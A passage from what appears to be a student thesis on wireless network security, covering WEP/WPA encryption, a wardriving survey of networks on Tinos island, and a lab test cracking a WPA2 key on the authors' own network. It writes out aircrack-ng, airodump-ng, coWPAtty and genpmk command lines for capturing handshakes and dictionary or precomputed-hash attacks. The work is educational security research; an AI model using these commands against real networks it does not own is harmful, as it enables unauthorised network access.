initialization vector with length 24-bit, encryption key with length 40 or 104 bit, in contrast to WPA that
uses initialization vector with 48-bit and encryption key with length 128-bit.
WEP is insufficient for security, because the attacks targeted on initialization vector and on changes of
packages. WPA has minimized such attacks because of the combination of TKIP, the MIC and the
longest initialization vector.
TKIP key uses about 250 trillion possible keys to encrypt the packet. Combining this with the 48-bit
initialization vector, TKIP contributes to effective security network on key recovery attacks. Also, the
MIC provides protection on subject of packets interception.
WPA-Enterprise and WPA-PSK encryption provide a strong security mechanism. In WEP authentication
of the user were by sharing of a common key. In WPA, authentication and encryption are separate
functions. The authentication in 802.1x server is done with credentials and the keys are distributed
automatically.
Upon entry of the new algorithm, RC4algorithmwas replaced. Like TKIP, CCMP also uses initialization
vector with length 48-bit, but instead of use of sequence of numbers per package, it uses AES key to
protect confidentiality and integrity of the package.
It uses initialization vector with length 48-bit and encryption key with length 128-bit which minimizes
the vulnerability of the system to repeated attacks. The enhanced protection provided by CCMP in
comparison to TKIP requires more processing power, and often need new or upgraded hardware.
[21]
3.3. Types of Attacks on wireless networks
Wireless networks because of transmission medium are susceptible to attack. These attacks carried out
for different purposes, for example, an attacker may simply wants to control the traffic or access into a
network.
Attacks on ad hoc wireless networks can be classified into two broad categories, namely, passive and
active attacks.
The term «Wardriving» describes the practice in which one user wanders through the streets of
neighborhoods, provided with a device. It has wireless access in order to detect wireless networks and to
maps their existence for statistical or other reasons.
It took its name from a common practice in1980 known as «Wardialing» in which the “perpetrators”
were calling telephone numbers in order to locate dial-up, and then attempt the illegal use of these
modems for the illegal access to telephone networks, subsequently on the internet.
Wardriving was first reported in the US in 2000, in a survey for wireless networks in the city of Berkeley
California. This research aimed to show the security gaps of wireless networks which were growing
rapidly at Berkeley, and it was necessary to improve the wireless network technology in terms of security
of information systems.
The survey showed that access to wireless network is possible, using simple tools, even over a long
distance from where the wireless transmitter is mounted.
Wardriving does not require the use of expensive or hard to find equipment for carrying out this
verification. It can be done using either a laptop computer or a smartphone.
4.2.Wardriving Equipment
There are many tools for this type of attack. In our project we are going to use a smartphone and android
application Wigle.
Image 17 - Vodafone Smart 4 Review Image 18– WigleWifiWardriving Application at Google Play Store
[23]
Specifically, the equipment we use is:
1. A smartphone, Vodafone Smart 4 with android version 4.4.2.
2. Android application, Wigle Wifi Wardriving, version 2.7. It’s free.
3. Gps receiver. This is provided by specific smartphone.
4. Microsoft Excel 2010. It’s needed for data analysis.
Source: andronexus.store.aptoide.com
WiGLE was started in 2001. Some of the features of current version are:
Export to CSV files on SD card (comma separated values).
Export to KML files on SD card (to import into Google Maps/Earth).
Local database to track new networks found
[24]
Real-time map of networks found (Open Street Map)
Bluetooth GPS support through mock locations
Can move app to SD card
Source: andronexus.store.aptoide.com
Image 21 - Wireless Networks in and around central town of Tinos Greek Island – Google Earth view
Image 22 - Wardriving followed paths in and around central town of Tinos Greek Island – Google Earth view
[26]
4.3.1. Preparation process for analysis of data
For CSV analysis we used Microsoft Excel 2013. For reading the extracted .CSV file, we made the
following steps:
After we completed the prerequisite text import wizard, we have classified the data of CSV file uniformly
like the following figure.
[27]
Step 3. We have to clean the data
4.4. Security analysis of wireless networks in and around central town of Tinos Greek
Island-Results
Analyzing the CSV data we observed that 1.396 in 1.416 wireless users use WPA or WPA2 encryption,
only 1,4% use the completely insecure WEP, while no users use non-security encryption!
Table 1 displays the results of the total allocation of security protocols, while graph 1 shows graphically
the distribution of security protocols in percentage.
Security Times %
WEP 20,00 1,4
WPA or WPA2 1396,00 98,6
No Protection 0,00 0
Total 1416,00 100
Table 1. Wireless networks in and around central town of Tinos Greek island – Security Analysis of data
Graph 1. Wireless networks in and around central town of Tinos Greek island – Security Analysis of data
[28]
These results justify the following fact. In recent years, all providers and manufacturers of wireless
devices provide wireless devices with preconfigured the WPA / WPA2 protocol. The devices are shipped
to the end user with default settings and personalized. This means that each device has implemented the
WPA / WPA2 protocol with a predefined different password. So it's very easy for someone to have
security on their wireless network without the necessary knowledge.
4.5. Channel analysis of wireless networks in and around central town of Tinos Greek
Island-Results
Wireless networks in the frequency band of 2.4 GHz implement 13 different channels with a width of 22
MHz each one.
Channel analysis shows that the vast majority of networks use specific channels. These are channel 1,
channel 6 and channel 11. The most channels remain substantially unused. This means that the network
efficiency declines, there are increased mistakes and retransmission schemes, even loss of data reliability.
Channel Times %
1 433,00 30,6
2 60,00 4,23
3 27,00 1,91
4 32,00 2,26
5 19,00 1,34
6 300,00 21,19
7 35,00 2,47
8 27,00 1,91
9 114,00 8,05
10 36,00 2,54
11 281,00 19,83
12 15,00 1,06
13 37,00 2,61
Total 1416,00 100
Table 2. Wireless networks in and around central town of Tinos Greek island – Channel Analysis of data
1 2 3 4 5 6 7 8 9 10 11 12 13
Graph 2. Wireless networks in and around central town of Tinos Greek island – Channel Analysis of data
[29]
EMPIRICAL PART 2
CHAPTER 5: CRACKING SECURITY IN WIRELESS NETWORKS
In the previous chapter, we saw one of the most prevalent ways in which an analysis was made in
protection protocol used in wireless networks of a particular research area. As already noted above, WPA
& WPA2 protection protocols are the most widespread in the study area because of the predetermined
procedure for implementing protection wireless network from the manufacturing company of the router
device.
In addition to the above research, knowing that WPA2 is one of the widely used security protocols, we
carry out a series of attacks to find the encrypted key of a tested device, using the strong Kali Linux
distribution.
Source: en.wikipedia.org
It can be installed and operates in a wide variety of computer systems, from small devices such as mobile
phones to large computer systems and supercomputers.
In distributions of Linux, the core with accompanying programs such as libraries, system tools, Windows
interface and many other applications required for the proper functioning of a computer are available.
A characteristic of distributions is the great potential for the configuration they offer as each one is
addressed to a different kind of user.
[30]
Image 28 - Kali Linux logo
Source: www.offensive-security.com
Kali Linux can run when installed on a computer's hard disk, can be booted from a live CD or live USB,
or it can run within a virtual machine. It is a supported platform of the Metasploit Project's Metasploit
Framework, a tool for developing and executing security exploits.
Kali linux tools are classified into the following categories:
INFORMATION GATHERING
VULNERABILITY ANALYSIS
WIRELESS ATTACKS
WEB APPLICATIONS
REPORTING TOOLS
HARDWARE HACKING
REVERSE ENGINEERING
MAINTAINING ACCESS
PASSWORD ATTACKS
SNIFFING & SPOOFING
STRESS TESTING
FORENSICS TOOLS
EXPLOITATION TOOLS
REPORTING TOOLS
For this type of attack, we use specific tools such as a conventional network card, Kali Linux distribution
and a wireless network that uses WPA / WPA2 encryption.
In particular, for the attack we have used:
[31]
Laptops
We have used two laptops for simulating the attack.
Source: www.cnet.com
The first one is model Samsung R530.The attacks were carried out using the available integrated wireless
network card of this laptop.
Source: driverbasket.com
The second laptop has suffered attacks. Its model is HP, Compaq 610q. It features integrated wireless
network card that supports the standards IEEE 802.11b, IEEE 802.11g, IEEE 802.11n and WEP / WPA /
WPA2encryption methods.
Source: websec.ca
[32]
For the realization of the attacks, WPA2 encoding with SSID «Wind_Wi_Fi» and password
«tinosemagazine11» was defined.
5.4.1.Dictionary attack
The dictionary attack is a method to crack a wireless network. It is very efficient and fast because many
computer users insist on using common passwords.
Usually all possible combinations of 8-character words contained in such dictionaries. It turns out those
words in length less than 20 characters, it is statistically impossible to withstand this kind of attack. The
dictionary attacks are rarely successful against systems that use many keywords phrases, and
unsuccessful against systems using random combinations of capital and lower case letters and contain
numbers and symbols.
[33]
The aircrack-ng suite includes:
airmon-ng
airodump-ng
aireplay-ng
aircrack-ng
airolib-ng
5.5.1.About Airmon-ng
At first, to be able to carry out the attack we must put the computer's network card that performs the
attack on monitor mode. That process is done with “Airmon-ng”.
“Airmon-ng” is used to put our network card in monitor mode.
Usage
airmon-ng {start|stop} {interface}
where
start|stop determines whether to activate or to deactivate monitor status in our wireless card.
interface specifies the network card to which you want to enable / disable monitor status
After that, we should start the process of capturing information packets and the collection of IVs. For
this purpose “Airodump-ng” is used.
“Airodump-ng” is used to capture packets from 802.11 networks and for collecting IVs (Initialization
Vectors). It can also used to identify 802.11 networks that are within coverage in our card.
[34]
Usage
airodump-ng {interface}
where
interface specifies the network card that will be used in order to record packets.
When customers are connected to the AP we have the following customer details.
The address of the AP to which is connected the customer appears below the BSSID.
Under Station is shown MAC address of the client.
Under Packets is shown the number of packets that have recorded and are intended for this client.
In order to obtain more rapidly the packets that the interest access point send, and record the packets that
will be injected, we need to focus on the specific access point.
Usage
airodump-ng --channel 1 --write Wind_Wi_Fi --bssid 4C:ED:DE:1E:96:8E wlan0mon
[35]
Image 34 - "Concept" of the handshake packet
5.5.3. Aircrack-ng
“Aircrack-ng” is a tool that is used to crack a encryption key of an access point. It is the first of the four
attacks that will be performed in this investigation, in an attempt to ascertain which of these attacks is the
fastest and most effective. Like most attack tools, “aircrack-ng” uses the log of IV's and a dictionary file.
Usage
[36]
aircrack-ng [input] {capture file(s)}
aircrack-ng Wind_Wi_Fi-01.cap –w dictionary.txt
[37]
5.6. Airolib-ng & Aircrack-ng
The second attack is performed again with “Aircrack” but in combination with “Airolib-ng” and this time
through another attacking method, the precomputed hashes.
“Airolib-ng” is used to store and manage the ESSID lists, the password and to compute the Pairwise
Master Keys(PMKs). The program uses the SQLite3 database which is available for many platforms and
makes better memory and disk space management. Gives us the possibility to budget the PMK for use in
the future.
[38]
5.7. coWPAtty
“Aircrack-ng” is a powerful tool, but it has some limitations. A more powerful attack tool is
“coWPAtty”. Created by Joshua Wright and as a good tool it can be combined with popular password
cracking tools such as «John the ripper».
It is a dictionary attack tool, which requires receiving at least 2 frames of a 4-way handshake.
“CoWPAtty” is the tool that we will use as second way of a dictionary attack. We have to specify the
dictionary attack, the SSID of the network and the log of IV's.
Usage
cowpatty –s Wind_Wi_Fi –rWind_Wi_Fi-01.cap –f dictionary.txt
[39]
5.8.genpmk &coWPAtty
The “genpmk” command is a tool that used to create pre-computed hashes files. It’s a different tool for
attacking with pre-computed hashes. There is interdependence of the SSID of the Access Point. This
means that we need different hash sets for each unique SSID.
Usage
genpmk -s Wind_Wi_Fi –d Wind_Wi_Fi.hash–f dictionary.txt
cowpatty –s Wind_Wi_Fi –r Wind_Wi_Fi-01.cap –dWind_Wi_Fi.hash
[40]
Image 43 - Preparation with genpmk
[41]
Image 45 - Attack using pre-computed hashes
To attack the wireless network «Wind_Wi_Fi» used a dictionary with 2.804.985 words, size 26.9 MB.
The key phrase is located at 1.121.984 line, therefore the program for calculating the key worked 40% of
the lexicon. At the following table we observe the effects of the attacks. The application used for each
attack is in the column software, the column time shows in seconds the time duration of each attack, the
column keys/sec indicates the rate of access of the dictionary and the column Pre-calculated time (sec)
shows in seconds the amount of time it took tools “airolib-ng” and “genpmk” to create hash files.
Comparing each attack on the period of implementation , we observe that the most time was taken by
the command “coWPAtty” in dictionary attack with 2.764,63s , ie about 45 min, while the shortest
attack performed also with “CoWPAtty” in combination with “genpmk” (in attack with pre-computed
hashes) at only 6,44s.
[42]
Time (sec)
Time (sec)
4346,01000
715
17 7
aircrack-ng (dictionary) airolib-ng & aircrack-ng coWPAtty (dictionary) genpmk & coWPAtty
(pre-computed hashes) (pre-computed hashes)
Especially, comparing dictionary attacks we observe that the command “Aircrack-ng” time completion of
the attack is 715s, about 12 min, in contrast to “coWPAtty”, which as mentioned above, took
approximately 45 min.
4346,01000
715
[43]
11600,0 11516,0
11400,0
11200,0
11000,0
10800,0 10671,0
10600,0
10400,0
10200,0
airolib-ng & aircrack-ng (pre-computed hashes)
genpmk & coWPAtty (pre-computed hashes)
18 17
16
14
12
10
8 7
6
4
2
0
In conclusion, “Aircrack-ng” is better with dictionary attack, while “genpmk” & “coWPAtty” is better
to pre-computed hashes.
[44]
CONCLUSIONS
This thesis introduced a general overview of some attacks which violate the security of wireless
networks.
Wireless LANs, because of the advantages they offer, have a great acceptance by consumers and are
spreading rapidly. However, the main issue that concerns all operators engaged in their development is
the issue of security.
To improve the security of wireless networks encryption algorithms were used, but there also have
weaknesses. The WEP encryption protocol appeared first and revealed many gaps in security. Despite all
the improvements, WEP failed to be characterized as a secure protocol. A new, more effective solution
was proposed to the standard 802.11i, the WPA encryption protocol and the final version of the WPA2,
to achieve even greater security. Developed to address and correct the deficiencies of WEP, it uses the
encryption algorithm CCMP, which provides confidentiality, authentication, integrity and protection
against replay packets. The attacks on networks with WEP and WPA / WPA2 encryption protocol were
automated using applications such as suite of tools AirCrack, so everyone who has a modern computer
and an understanding of computer technology may implement attacks. However, an integrated Security
system becomes weak if one does not know how to utilize it.
[45]
BIBLIOGRAPHY
Vijay K. Garg, 2007,Wireless Communications & Networking, University of Illinois, Chicago, USA.
Stallings William, 2004, Wireless Communications & Networks, Second edition, Pearson Prentice Hall,
USA.
B.P. Crow, I. Widjaja, J. G. Kim, and P. Sakai , 1997, Investigation of the IEEE 802.11 Medium Access
Control (MAC) Sublayer Functions, Dept. of Electr. &Comput. Eng., Arizona Univ., Tucson, AZ
Johnny Cache, Joshua Wright, Vincent Liu, 2010, Hacking exposed wireless: Wireless security &
solutions, Second edition, Mc graw-Hill, USA
A.K.M. Nazmus Sakib, FarihaTasmin Jaigirdar, Muntasim Munim,,Armin Akter, 2011,Security
Improvement of WPA 2, Global Journals Inc.USA
A.Habibi Lashkari, Mir Mohammad Seyed Danesh, Behrang Samadi, 2009, A Survey on Wireless
Security protocols, IEEE, Beijing
P. Arana, 2006, Benefits and Vulnerabilities of Wi-Fi Protected Access 2 (WPA2), INFS
J. Korhonen,1999,HiperLan/2, Department of Computer Science and Engineering, Helsinki
M. Papadopoulos, 2006, Wardriving, Warchalking & Wireless Hacking, 2nd National Conference, Athens
T. Hassinen, 2006, Overview of WLAN security, Helsinki University of Technology, TKK T-110.5290
Seminar on Network Security
[46]